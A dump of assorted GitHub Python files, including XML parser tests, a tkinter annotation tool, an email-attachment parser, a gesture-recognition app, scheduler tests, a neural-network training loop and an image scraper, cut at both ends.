{'{http://www.landxml.org/schema/LandXML-1.1}': control_list}\n self.assertDictEqual(test_dict, control_dict)\n\n def test_search_nodes(self):\n products = self.parser.search_nodes(tag='controller')\n products_list = list(products)\n\n test_num_matches = len(products_list)\n control_num_matches = 3\n self.assertEqual(test_num_matches, control_num_matches)\n\n test_product = products_list[0]['elem']\n control_product = {'type': 'usb', 'index': '0',\n 'text': '\\n ',\n 'tag': 'controller'}\n\n self.assertDictEqual(test_product, control_product)\n\n test_list = products_list[0]['children']\n control_list = [{'children': [],\n 'elem': {'name': 'usb0',\n 'text': None, 'tag': 'alias'}},\n {'children': [],\n 'elem': {'type': 'pci', 'domain': '0x0000',\n 'bus': '0x00', 'slot': '0x01',\n 'function': '0x2',\n 'text': None, 'tag': 'address'}}]\n\n self.assertEqual(test_list, control_list)\n\n def test_search_node_attr(self):\n product = self.parser.search_node_attr(\n tag='controller', type='usb')\n prod_list = list(product)\n\n test_matches = len(prod_list)\n control_matches = 1\n self.assertEqual(test_matches, control_matches)\n\n test_product_elem = prod_list[0]['elem']\n control_product_elem = {'type': 'usb', 'index': '0',\n 'text': '\\n ',\n 'tag': 'controller'}\n self.assertEqual(test_product_elem, control_product_elem)\n\n test_product_children = prod_list[0]['children']\n control_product_children = [{'children': [],\n 'elem': {'name': 'usb0',\n 'text': None,\n 'tag': 'alias'}},\n {'children': [],\n 'elem': {'type': 'pci',\n 'domain': '0x0000',\n 'bus': '0x00',\n 'slot': '0x01',\n 'function': '0x2',\n 'text': None,\n 'tag': 'address'}}]\n self.assertEqual(test_product_children, control_product_children)\n\n def test_get_all_tags(self):\n\n test_list = self.parser.get_all_tags()\n control_list = ['sound', 'memballoon', 'pae', 'currentMemory', 'disk',\n 'mac', 'boot', 'emulator', 'driver', 'graphics',\n 'imagelabel', 'virtualport', 'video', 'on_crash',\n 'resource', 'serial', 'name', 'cpu', 'feature',\n 'alias', 'os', 'address', 'memory', 'channel',\n 'controller', 'console', 'parameters', 'uuid',\n 'devices', 'listen', 'domain', 'interface',\n 'type', 'input', 'label', 'on_poweroff',\n 'features', 'acpi', 'seclabel', 'vcpu', 'clock',\n 'on_reboot', 'apic', 'source', 'protocol',\n 'target', 'model', 'partition']\n control_list.sort()\n test_list.sort()\n\n self.assertListEqual(test_list, control_list)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jdelgit/txml","sub_path":"test_txml.py","file_name":"test_txml.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22633223046","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n#django\n\n#python\nimport tkinter as tk\nfrom tkinter import Label,Tk\nfrom PIL import Image, ImageTk\nimport PIL.Image\nimport json\n#gazepattern\nfrom eyedetector.models import Image, ImageRectangle\n\n\nclass Application(object):\n\n def __init__(self, image_path, image):\n root = tk.Tk()\n root.geometry( \"1000x720\" )\n self.aois = []\n self.parent = root\n self.path = image_path\n self.image = image\n self.move = False\n self._create_canvas()\n self._create_canvas_binding()\n root.mainloop()\n\n def _create_canvas(self):\n self.canvas = tk.Canvas(self.parent, width = 1366, height = 768,\n bg = \"white\" )\n self.canvas.grid(row=0, column=0, sticky='nsew')\n #path=filedialog.askopenfilename(filetypes=[(\"Image File\",'.jpg')])\n self.im = PIL.Image.open(self.path)\n self.wazil,self.lard=self.im.size\n self.canvas.config(scrollregion=(0,0,self.wazil,self.lard))\n self.tk_im = ImageTk.PhotoImage(self.im)\n self.canvas.create_image(0,0,anchor=\"nw\",image=self.tk_im)\n\n def _create_canvas_binding(self):\n self.canvas.bind( \"\", self.start_rect )\n self.canvas.bind( \"\", self.stop_rect )\n self.canvas.bind( \"\", self.moving_rect )\n\n def start_rect(self, event):\n self.move = True\n #Translate mouse screen x0,y0 coordinates to canvas coordinates\n self.rectx0 = self.canvas.canvasx(event.x)\n self.recty0 = self.canvas.canvasy(event.y) \n #Create rectangle\n self.rect = self.canvas.create_rectangle(\n self.rectx0, self.recty0, self.rectx0, self.recty0)\n #Get rectangle's canvas object ID\n self.rectid = self.canvas.find_closest(self.rectx0, self.recty0, halo=2)\n print('Rectangle {0} started at {1} {2} {3} {4} '.\n format(self.rect, self.rectx0, self.recty0, self.rectx0,\n self.recty0))\n\n def moving_rect(self, event):\n if self.move: \n #Translate mouse screen x1,y1 coordinates to canvas coordinates\n self.rectx1 = self.canvas.canvasx(event.x)\n self.recty1 = self.canvas.canvasy(event.y)\n #Modify rectangle x1, y1 coordinates\n self.canvas.coords(self.rectid, self.rectx0, self.recty0,\n self.rectx1, self.recty1)\n print('Rectangle x1, y1 = ', self.rectx1, self.recty1)\n\n def stop_rect(self, event):\n \"\"\"\n Una vez que se termina de seleccionar el área, se muestra la pantalla de tkinter dónde se debe ingresar el nombre del área\n \n \"\"\"\n\n\n self.move = False\n #Translate mouse screen x1,y1 coordinates to canvas coordinates\n self.rectx1 = self.canvas.canvasx(event.x)\n self.recty1 = self.canvas.canvasy(event.y) \n #Modify rectangle x1, y1 coordinates (final)\n self.canvas.coords(self.rectid, self.rectx0, self.recty0,\n self.rectx1, self.recty1)\n window = tk.Tk()\n\n window.title(\"Area of Interest\")\n labelone = tk.Label(window, text=\"Name of Area of Interest\")\n labelone.grid(row = 0, column = 0)\n name = tk.StringVar()\n\n userEntry = tk.Entry(window, textvariable = name)\n userEntry.grid(row = 0, column = 1)\n\n def addAOI():\n \"\"\"\n Se agrega al JSON el elemento con el nombre y sus coordenadas\n \"\"\"\n\n string_answer = userEntry.get()\n item = {\n 'x0': self.rectx0, 'y0': self.recty0,\n 'x1': self.rectx1, 'y1': self.recty1,\n 'aoi': string_answer\n }\n\n self.aois.append(item)\n print(self.aois)\n close_window()\n \n def close_window(): \n window.destroy()\n\n def finish_program():\n self.parent.destroy()\n\n def save_json():\n with open('data.json', 'w') as outfile:\n \n self.image.rectangles.all().delete()\n for aoi in self.aois:\n rectangle = ImageRectangle()\n rectangle.x0 = aoi.get('x0')\n rectangle.x1 = aoi.get('x1')\n rectangle.y0 = aoi.get('y0')\n rectangle.y1 = aoi.get('y1')\n rectangle.name = aoi.get('aoi')\n rectangle.image = self.image\n rectangle.save()\n print(rectangle)\n\n close_window()\n finish_program()\n\n btn = tk.Button(window, text =\"Add\", command = addAOI)\n btn.grid(row = 0, column = 3)\n btn = tk.Button(window, text =\"Finish AOI definition\", command = save_json)\n btn.grid(row = 1, column = 1)\n\n\nclass ShowImage(object):\n\n def __init__(self, image_path, patern): \n root = tk.Tk()\n root.geometry( \"1000x720\" )\n root.attributes(\"-fullscreen\", True)\n self.parent = root\n self.path = image_path\n\n self.canvas = tk.Canvas(self.parent, width = 1366, height = 768,\n bg = \"white\" )\n self.canvas.grid(row=0, column=0, sticky='nsew')\n #path=filedialog.askopenfilename(filetypes=[(\"Image File\",'.jpg')])\n self.im = PIL.Image.open(self.path)\n self.wazil,self.lard=self.im.size\n self.canvas.config(scrollregion=(0,0,self.wazil,self.lard))\n self.tk_im = ImageTk.PhotoImage(self.im)\n self.canvas.create_image(0,0,anchor=\"nw\",image=self.tk_im)\n\n # make the top right close button minimize (iconify) the main window\n root.protocol(\"WM_DELETE_WINDOW\", root.iconify)\n\n # make Esc exit the program\n root.bind('', lambda e: root.destroy())\n\n # create a menu bar with an Exit command\n menubar = tk.Menu(root)\n filemenu = tk.Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Terminar Experimento\", command=root.destroy)\n menubar.add_cascade(label=\"Experimento\", menu=filemenu)\n root.config(menu=menubar)\n\n root.mainloop()\n patern.app_has_destroy = True","repo_name":"AriRodriguezCruz/mcfgpr","sub_path":"gazepattern/gui/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10232086259","text":"import os\nimport csv\nimport base64\nimport html2text\nimport docx2txt\nfrom docx import Document\nfrom parsers import Parsers\nfrom .Worker import Worker\n\n\nclass Processor:\n\n def __init__(self, worker: Worker):\n self.tmp_fldr = os.getcwd() + '/temp/'\n self.worker = worker\n self.log = self.worker.logger\n self.docx_ext = '.docx'\n\n @staticmethod\n def attach_extention_check(attach_name):\n ext = attach_name.split('.')[-1]\n return (\n (ext == 'docx' or ext == 'doc' or ext == 'pdf' or ext == 'xls' or ext == 'xlsx')\n and\n ('рекв' in attach_name.lower() or 'карт' in attach_name.lower())\n )\n\n @staticmethod\n def attach_name_check(attach_name):\n return ('тз' not in attach_name.lower().split(' ') and 'заяв' not in attach_name.lower())\n\n def parse_docx(self, attachment_path):\n \"\"\"Parser via python-docx\"\"\"\n full_text = ''\n document = Document(''.join(attachment_path.split('.')[:-1]) + self.docx_ext)\n if len(document.tables) > 0:\n for table_count, _ in enumerate(document.tables):\n table = document.tables[table_count]\n for i, row in enumerate(table.rows):\n text = [cell.text + '\\n' for cell in row.cells if len(cell.text) > 2]\n full_text += '\\n '.join(text)\n\n paragraphs = []\n for num, para in enumerate(document.paragraphs):\n paragraphs.append(para.text)\n full_text += ' '.join(paragraphs)\n\n if len(full_text) == 0:\n extracted_list = []\n for x in docx2txt.process(''.join(attachment_path.split('.')[:-1]) + self.docx_ext).split():\n if x not in extracted_list:\n extracted_list.append(x)\n return ' '.join(extracted_list)\n\n return full_text\n\n @staticmethod\n def parse_csv(attachment_path):\n full_text = ''\n with open(''.join(attachment_path.split('.')[:-1]) + '.csv', newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n full_text += \" \" + ' '.join(row)\n return full_text\n\n def save_attachments_files(self, parsed_eml):\n os.makedirs(self.tmp_fldr, exist_ok=True)\n attach_names = []\n if len(parsed_eml['attachment']) > 0:\n for attach_count in range(len(parsed_eml['attachment'])):\n attach_name = parsed_eml['attachment'][attach_count]['filename']\n attach_name = attach_name.replace('.', '')[:40] + \".\" + attach_name.split(\".\")[-1]\n print(attach_name)\n if self.attach_extention_check(attach_name) and self.attach_name_check(attach_name):\n f = open(f'{self.tmp_fldr}/{attach_name}', 'wb+')\n f.write(base64.b64decode(parsed_eml['attachment'][attach_count]['raw']))\n f.close()\n attach_names.append(attach_name)\n self.log.info(f'{attach_names}')\n return attach_names\n\n def convert_attachment_file(self, attach_name: str):\n os.makedirs(self.tmp_fldr, exist_ok=True)\n attachment_path = f'{self.tmp_fldr}/{attach_name}'\n self.log.info(attachment_path)\n\n if attach_name.split('.')[-1] == 'doc':\n self.log.info('converting')\n cmd = f'lowriter --convert-to docx \"{attachment_path}\" --outdir \"{self.tmp_fldr}\"'\n os.system(cmd)\n elif attach_name.split('.')[-1] == 'pdf':\n self.log.info('converting')\n fltr = 'writer_pdf_import'\n cmd = f'libreoffice --infilter=\"{fltr}\" --convert-to docx \"{attachment_path}\" --outdir \"{self.tmp_fldr}\"'\n os.system(cmd)\n elif attach_name.split('.')[-1] == 'xlsx' or attach_name.split('.')[-1] == 'xls':\n self.log.info('converting')\n cmd = f'unoconv -f csv \"{attachment_path}\"'\n os.system(cmd)\n return attachment_path\n\n def org_structure(self, inn, bik, r_account, corr_account, email, first, middle, last, tel, website, address):\n return {\n 'inn': [inn if len(inn) == 10 or len(inn) == 12 else inn + '*'][0],\n 'bik': [bik if len(bik) == 9 else bik + '*'][0],\n 'r_account': [r_account if len(r_account) == 20 else r_account + '*'][0],\n 'c_account': [corr_account if len(corr_account) == 20 else corr_account + '*'][0],\n 'email': email,\n \"first\": first,\n \"middle\": middle,\n \"last\": last,\n \"phone\": tel,\n \"website\": website,\n \"address\": address,\n }\n\n def file_parsing(self, message_text, attach_texts, header_from):\n organization_dict, result = {}, []\n self.log.info(Parsers.clean_text(message_text))\n for attach_name, full_text in attach_texts.items():\n self.log.info(attach_name)\n card = Parsers.clean_text(full_text) # full_text att_text\n self.log.info(card)\n\n inn = Parsers.parse_inn(card)\n bik = Parsers.parse_bik(card)\n corr_account = Parsers.parse_corr_account(card)\n r_account = Parsers.parse_r_account(card)\n email = Parsers.get_email(message_text, header_from)\n first, last, middle = Parsers.get_name(message_text, header_from)\n tel = Parsers.parse_tel(Parsers.clean_text(message_text))\n address = Parsers.get_address(full_text)\n website_check = (\n len(Parsers.get_website(message_text)) == 0 and len(email) > 0\n and\n 'yandex' not in email and 'gmail' not in email and 'mail.ru' not in email and 'bk.ru' not in email\n )\n website = 'www.' + email.split('@')[-1] if website_check else Parsers.get_website(message_text)\n\n organization_dict[str(attach_name).split('/')[-1]] = self.org_structure(\n inn, bik, r_account, corr_account, email, first, middle, last, tel, website, address\n )\n\n self.log.info(str(organization_dict))\n result.append(organization_dict)\n\n return result\n\n def get_message_text(self, parsed_eml):\n message_text = ''\n header_from = parsed_eml['header']['header']['from'][0]\n if len(parsed_eml['body']) > 0:\n message_text += html2text.html2text(parsed_eml['body'][-1]['content'])\n return message_text, header_from\n","repo_name":"varsey/serverless-container","sub_path":"src/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36731706659","text":"import cv2 as cv\n\nfrom wizard.application.video_capture import VideoCapture\nfrom wizard.detectors.hand_gesture_detector import HandGestureDetector\nfrom wizard.application.app_startegy import HumanComputerInteractionApp, DatasetRecordingApp\nfrom wizard.application.painter import Painter\nfrom wizard.configuration.paths import backend_folder_path\n\n\nclass MainApp:\n\n def __init__(self):\n self.video_capture = VideoCapture()\n self.hand_gesture_detector = HandGestureDetector()\n self.context = HumanComputerInteractionApp()\n self.painter = Painter()\n\n self.video = cv.VideoWriter('video.mp4',\n cv.VideoWriter_fourcc(*'XVID'),\n 10, (int(self.video_capture.cap.get(3)), int(self.video_capture.cap.get(4))))\n\n\n def __del__(self):\n cv.destroyAllWindows()\n self.video.release()\n\n\n def run(self):\n while True:\n key = cv.waitKey(1)\n if key == ord('q'):\n break\n elif ord('0') <= key <= ord('9'):\n self.context.update_with_parameters({'gesture_id': int(chr(key))})\n else:\n self.decide_strategy(key)\n\n ret, frame = self.video_capture.read()\n if not ret:\n break\n\n hand_gestures = self.hand_gesture_detector.process_frame(frame)\n if hand_gestures:\n self.context.handle_hand_gestures(hand_gestures)\n\n # Draw Hand gestures info\n for gesture in hand_gestures:\n rect = self.painter.calc_bounding_rect(frame, gesture.landmarks)\n \n frame = self.painter.draw_info_text(frame, gesture.name, rect)\n frame = self.painter.draw_bounding_rect(frame, rect)\n frame = self.painter.draw_landmarks(frame, gesture.landmarks)\n \n if gesture.id == 3:\n frame = self.painter.draw_line_between_fingers(frame, gesture.landmarks, \n self.hand_gesture_detector.mp_hands.HandLandmark.THUMB_TIP,\n self.hand_gesture_detector.mp_hands.HandLandmark.INDEX_FINGER_TIP)\n \n\n cv.imshow('Wizard', frame)\n # self.video.write(frame)\n \n def decide_strategy(self, key):\n if key == ord('d'):\n self.context = DatasetRecordingApp()\n elif key == ord('n'):\n self.context = HumanComputerInteractionApp()\n","repo_name":"Pasemko/wizard","sub_path":"wizard/application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22067273879","text":"# Stdlib imports\n\n# Core Django imports\nfrom django.conf.urls import url\n\n# Third-party app imports\n\n# Imports from apps\nfrom . import views\n\napp_name='tutorial'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^build_a_bundle/$', views.build_a_bundle, name='build_a_bundle'),\n url(r'^build_a_bundle/bundle_and_collections/$', views.bundle_and_collections, name='bundle_and_collections'),\n url(r'^build_a_bundle/(?P\\d+)/collection_context/$', views.collection_context, name='collection_context'),\n url(r'^build_a_bundle/(?P\\d+)/collection_data/$', views.collection_data, name='collection_data'),\n url(r'^build_a_bundle/(?P\\d+)/collection_document/$', views.collection_document, name='collection_document'),\n\n]\n","repo_name":"atmospheresnode/ELSA","sub_path":"tutorial/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73363791548","text":"import re\nimport sys\n\nif __name__ == \"__main__\":\n auto = True\n if auto:\n inp = 'blabla is a tandem repetition\\n123123 is good too\\ngo go\\naaa'.split('\\n')\n else:\n inp = sys.stdin\n for line in inp:\n if re.search(r'\\b(\\w{2,})\\1\\b', line.strip()):\n print(line)\n","repo_name":"expo-lux/stepik_python_essentials_and_applications","sub_path":"task_3_2_11_regexp.py","file_name":"task_3_2_11_regexp.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25553403588","text":"from unittest.mock import patch\n\nimport pytest\n\nfrom pydolphinscheduler.core.engine import Engine, ProgramType\n\nTEST_ENGINE_TASK_TYPE = \"ENGINE\"\nTEST_MAIN_CLASS = \"org.apache.examples.mock.Mock\"\nTEST_MAIN_PACKAGE = \"Mock.jar\"\nTEST_PROGRAM_TYPE = ProgramType.JAVA\n\n\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_get_jar_detail(mock_resource, mock_code_version):\n \"\"\"Test :func:`get_jar_id` can return expect value.\"\"\"\n name = \"test_get_jar_detail\"\n task = Engine(\n name,\n TEST_ENGINE_TASK_TYPE,\n TEST_MAIN_CLASS,\n TEST_MAIN_PACKAGE,\n TEST_PROGRAM_TYPE,\n )\n assert 1 == task.get_jar_id()\n\n\n@pytest.mark.parametrize(\n \"attr, expect\",\n [\n (\n {\n \"name\": \"test-task-params\",\n \"task_type\": \"test-engine\",\n \"main_class\": \"org.apache.examples.mock.Mock\",\n \"main_package\": \"TestMock.jar\",\n \"program_type\": ProgramType.JAVA,\n },\n {\n \"mainClass\": \"org.apache.examples.mock.Mock\",\n \"mainJar\": {\n \"id\": 1,\n },\n \"programType\": ProgramType.JAVA,\n \"localParams\": [],\n \"resourceList\": [],\n \"dependence\": {},\n \"conditionResult\": {\"successNode\": [\"\"], \"failedNode\": [\"\"]},\n \"waitStartTimeout\": {},\n },\n )\n ],\n)\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_property_task_params(mock_resource, mock_code_version, attr, expect):\n \"\"\"Test task engine task property.\"\"\"\n task = Engine(**attr)\n assert expect == task.task_params\n\n\n@pytest.mark.parametrize(\n \"attr, expect\",\n [\n (\n {\n \"name\": \"test-task-test_engine_get_define\",\n \"task_type\": \"test-engine\",\n \"main_class\": \"org.apache.examples.mock.Mock\",\n \"main_package\": \"TestMock.jar\",\n \"program_type\": ProgramType.JAVA,\n },\n {\n \"code\": 123,\n \"name\": \"test-task-test_engine_get_define\",\n \"version\": 1,\n \"description\": None,\n \"delayTime\": 0,\n \"taskType\": \"test-engine\",\n \"taskParams\": {\n \"mainClass\": \"org.apache.examples.mock.Mock\",\n \"mainJar\": {\n \"id\": 1,\n },\n \"programType\": ProgramType.JAVA,\n \"localParams\": [],\n \"resourceList\": [],\n \"dependence\": {},\n \"conditionResult\": {\"successNode\": [\"\"], \"failedNode\": [\"\"]},\n \"waitStartTimeout\": {},\n },\n \"flag\": \"YES\",\n \"taskPriority\": \"MEDIUM\",\n \"workerGroup\": \"default\",\n \"failRetryTimes\": 0,\n \"failRetryInterval\": 1,\n \"timeoutFlag\": \"CLOSE\",\n \"timeoutNotifyStrategy\": None,\n \"timeout\": 0,\n },\n )\n ],\n)\n@patch(\n \"pydolphinscheduler.core.task.Task.gen_code_and_version\",\n return_value=(123, 1),\n)\n@patch(\n \"pydolphinscheduler.core.engine.Engine.get_resource_info\",\n return_value=({\"id\": 1, \"name\": \"mock_name\"}),\n)\ndef test_engine_get_define(mock_resource, mock_code_version, attr, expect):\n \"\"\"Test task engine function get_define.\"\"\"\n task = Engine(**attr)\n assert task.get_define() == expect\n","repo_name":"funnyzpc/dolphinscheduler-2.0.5","sub_path":"dolphinscheduler-python/pydolphinscheduler/tests/core/test_engine.py","file_name":"test_engine.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21388396002","text":"\"\"\"Routes for portfolio.\"\"\"\nfrom flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap\n\n\napp = Flask(__name__)\nBootstrap(app)\n\n\n@app.route('/')\ndef index():\n \"\"\"Display homepage.\"\"\"\n return render_template('homepage.html')\n\nif __name__ == \"__main__\":\n\n app.debug = True\n app.jinja_env.auto_reload = app.debug\n\n app.run()\n","repo_name":"gabrielainsf-zz/personal-website","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42856083571","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n爬取的是煎蛋网上的妹子图片\n'''\nimport re\nimport scrapy\nfrom scrapy import Request\nimport requests\nfrom lxml import etree\nimport base64\n\n\nclass InfoSpider(scrapy.Spider) :\n\n # 该爬虫的名字\n name = \"jiandan\"\n start_url = 'http://jandan.net/ooxx/page-1#comments'\n next_page = ''\n headers = {'referer': 'http://jandan.net/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'}\n # 设置计数器,以记录爬取的数据数量,方便命名本地保存的文件\n index = 1\n\n # start_request() 方法用来设置初始请求,可以不进行设置,但本人觉得还有有初始方法更像爬虫\n #另外,在这个方法中还可以设置cookie user-agent IP_proxy 等参数,以增强爬虫的能力\n #但煎蛋网不需要cookie 等参数,所以此处未设置\n\n def start_requests(self):\n # 超时设置为1秒,返回str\n html = requests.get(self.start_url, headers=self.headers, timeout=1).text\n # etree格式化\n html = etree.HTML(html)\n #使用xpath 查询图片链接 2018/8/12 煎蛋网图片的链接被隐藏,真正的链接需要用view-source:url 查看,并且使用base64加密\n for link in html.xpath('//div[@class=\"text\"]/p/span[@class=\"img-hash\"]/text()'):\n #构造完整url\n link = 'https:' + str(base64.b64decode(link), 'utf-8')\n #打印日志\n print('当前抓取链接:', self.next_page, '-----', link)\n with open('F:/jiandanscrapy/' + '{0}.{1}'.format(self.index, format(link[-4:])), 'wb') as jpg:\n try:\n # 抓取数据并保存,如果链接无效,继续循环\n r = requests.get(link, headers=self.headers, timeout=1)\n r.raise_for_status()\n jpg.write(r.content)\n # 打印日志\n print(\"正在抓取第%s条数据\" % self.index, '文件保存为:{0}.{1}'.format(self.index, format(link[-4:])))\n except:\n continue\n self.index += 1\n # 查询下一页链接,不为空则进入parse循环\n self.next_page = 'https:' + str(html.xpath('//div[@class=\"comments\"]/div[@class=\"cp-pagenavi\"]/a[@title=\"Newer Comments\"]/@href')[1])\n if self.next_page is not None:\n yield Request(self.next_page, callback=self.parse)\n #\n\n\n # parse 方法通过 Request中的callback调用\n def parse(self, response):\n # 解码respone\n response = response.text\n # etree格式化response\n html = etree.HTML(response)\n # 下面的for循环和上面一样\n for link in html.xpath('//div[@class=\"text\"]/p/span[@class=\"img-hash\"]/text()'):\n link = 'https:' + str(base64.b64decode(link), 'utf-8')\n print('当前抓取链接:', self.next_page, '-----', link)\n with open('F:/jiandanscrapy/' + '{0}.{1}'.format(self.index, format(link[-4:])), 'wb') as jpg:\n try:\n r = requests.get(link,headers=self.headers, timeout=1)\n r.raise_for_status()\n jpg.write(r.content)\n print(\"正在抓取第%s条数据\" % self.index, '文件保存为:{0}.{1}'.format(self.index, format(link[-4:])))\n except:\n continue\n self.index += 1\n\n # 同样构造下一页url\n self.next_page = 'https:' + str(html.xpath('//div[@class=\"comments\"]/div[@class=\"cp-pagenavi\"]/a[@title=\"Newer Comments\"]/@href')[1])\n if self.next_page is not None:\n # yield 回调parse\n yield Request(self.next_page, callback=self.parse)\n #\n","repo_name":"1344098010/scrapy_jandan","sub_path":"jd_scrapy/jd_scrapy/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5011385437","text":"#!/usr/local/bin/python3.4\nimport glob\nimport sys\nimport os\nimport filecmp\nimport re\n\n\ndef convertToAttrib():\n with open(\"rawGrades.xml\",\"r\") as f:\n lines = f.read()\n o = open(\"finalGrades.xml\",'w', newline=\"\\r\\n\")\n lines = lines.strip(\" \")\n #print(lines)\n ID = re.findall(r\"<(.*?)>(.*?):(.*?)\",lines)\n\n o.write(\"\")\n o.write(\"\\n\")\n #print(ID[0])\n subject = []\n for i in range(0,len(ID)):\n marks = {}\n id = ID[i][0]\n name = ID[i][1]\n rest = ID[i][2]\n id2 = ID[i][3]\n if id == id2:\n o.write(\"\\n \")\n marks_subject = re.findall(r\"\\[(.*?):(.*?)\\]\",rest)\n for i in range(0,len(marks_subject)):\n marks[marks_subject[i][0]] = marks_subject[i][1]\n keylist = []\n new = []\n new = marks.keys()\n for key in new:\n keylist.append(key)\n keylist.sort()\n for key in keylist:\n value = marks[key]\n o.write(\"\\n \")\n if(int(value) >= 60 and int(value) < 70):\n o.write(\"D\\\"/>\")\n if(int(value) >= 70 and int(value) < 80):\n o.write(\"C\\\"/>\")\n if(int(value) >= 80 and int(value) < 90):\n o.write(\"B\\\"/>\")\n if(int(value) >= 90):\n o.write(\"A\\\"/>\")\n o.write(\"\\n \")\n o.write(\"\\n\")\n o.close()\n\nif __name__ == \"__main__\":\n convertToAttrib()","repo_name":"bishop1612/ECE364","sub_path":"Lab09/generateReport.py","file_name":"generateReport.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21972881894","text":"import copy\nimport util\n\n\ndef train(model, x_train, y_train, x_valid, y_valid, config):\n \"\"\"\n Learns the weights (parameters) for our model\n Implements mini-batch SGD to train the model.\n Implements Early Stopping.\n Uses config to set parameters for training like learning rate, momentum, etc.\n\n args:\n model - an object of the NeuralNetwork class\n x_train - the train set examples\n y_train - the test set targets/labels\n x_valid - the validation set examples\n y_valid - the validation set targets/labels\n\n returns:\n the trained model\n \"\"\"\n\n batch_size = config[\"batch_size\"]\n num_epochs = config[\"epochs\"]\n early_stopping = config[\"early_stop_epoch\"]\n early_stop_on = config[\"early_stop\"]\n\n train_epoch_loss = []\n train_epoch_accuracy = []\n val_epoch_loss = []\n val_epoch_accuracy = []\n best_model = None\n best_val_accuracy = 0\n epochs_since_last_improvement = 0\n early_stop = -1\n\n for epoch in range(num_epochs):\n\n num_correct = 0\n\n total_loss = 0\n\n for x_batch, y_batch in util.generate_minibatches((x_train, y_train), batch_size):\n loss, accuracy = model.forward(x_batch, y_batch)\n\n model.backward()\n\n num_correct += util.calculateCorrect(model.y, y_batch)\n\n total_loss += loss\n\n train_accuracy = num_correct / len(x_train)\n\n train_loss = total_loss / len(x_train)\n\n train_epoch_loss.append(train_loss)\n train_epoch_accuracy.append(train_accuracy)\n\n val_accuracy, valLoss = model_test(model, x_valid, y_valid)\n\n val_epoch_loss.append(valLoss)\n val_epoch_accuracy.append(val_accuracy)\n\n if val_accuracy > best_val_accuracy:\n\n best_val_accuracy = val_accuracy\n\n best_model = copy.deepcopy(model)\n\n epochs_since_last_improvement = 0\n\n early_stop = epoch\n\n else:\n\n epochs_since_last_improvement += 1\n\n if epochs_since_last_improvement > early_stopping and early_stop_on:\n break\n\n print(\"Epoch: \", epoch, \"Training Loss: \", train_loss, \"Training Accuracy: \", train_accuracy,\n \"Validation Loss: \", valLoss, \"Validation Accuracy: \", val_accuracy)\n\n print(\"Best Validation Accuracy: \", best_val_accuracy)\n\n print(\"Early Stop: \", early_stop)\n\n util.plots(train_epoch_loss, train_epoch_accuracy, val_epoch_loss, val_epoch_accuracy, early_stop)\n\n return best_model\n\n\ndef model_test(model, X_test, y_test):\n \"\"\"\n Calculates and returns the accuracy & loss on the test set.\n\n args:\n model - the trained model, an object of the NeuralNetwork class\n X_test - the test set examples\n y_test - the test set targets/labels\n\n returns:\n test accuracy\n test loss\n \"\"\"\n\n num_correct = 0\n\n total_loss = 0\n\n for x_batch, y_batch in util.generate_minibatches((X_test, y_test), 1):\n loss, accuracy = model.forward(x_batch, y_batch)\n\n num_correct += util.calculateCorrect(model.y, y_batch)\n\n total_loss += loss\n\n test_accuracy = num_correct / len(X_test)\n\n test_loss = total_loss / len(X_test)\n\n return test_accuracy, test_loss\n","repo_name":"Anirudhaagrawal/cifar-100-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23928888379","text":"import tweepy\nimport pandas as pd\n\nfrom datetime import date, timedelta\nfrom loguru import logger\nfrom textblob import TextBlob\nfrom textblob.exceptions import NotTranslated\nfrom .model import Tweet, TweetComputed\n\n\nclass UpdateCommand:\n def __init__(\n self, consumer_key, consumer_secret, access_token, access_token_secret\n ):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n self._twitter = tweepy.API(auth)\n\n def execute(self):\n tweets = self._twitter.search(\"Bolsonaro\")\n logger.info(f\"fetched {len(tweets)} new tweets from twitter\")\n for tweet in 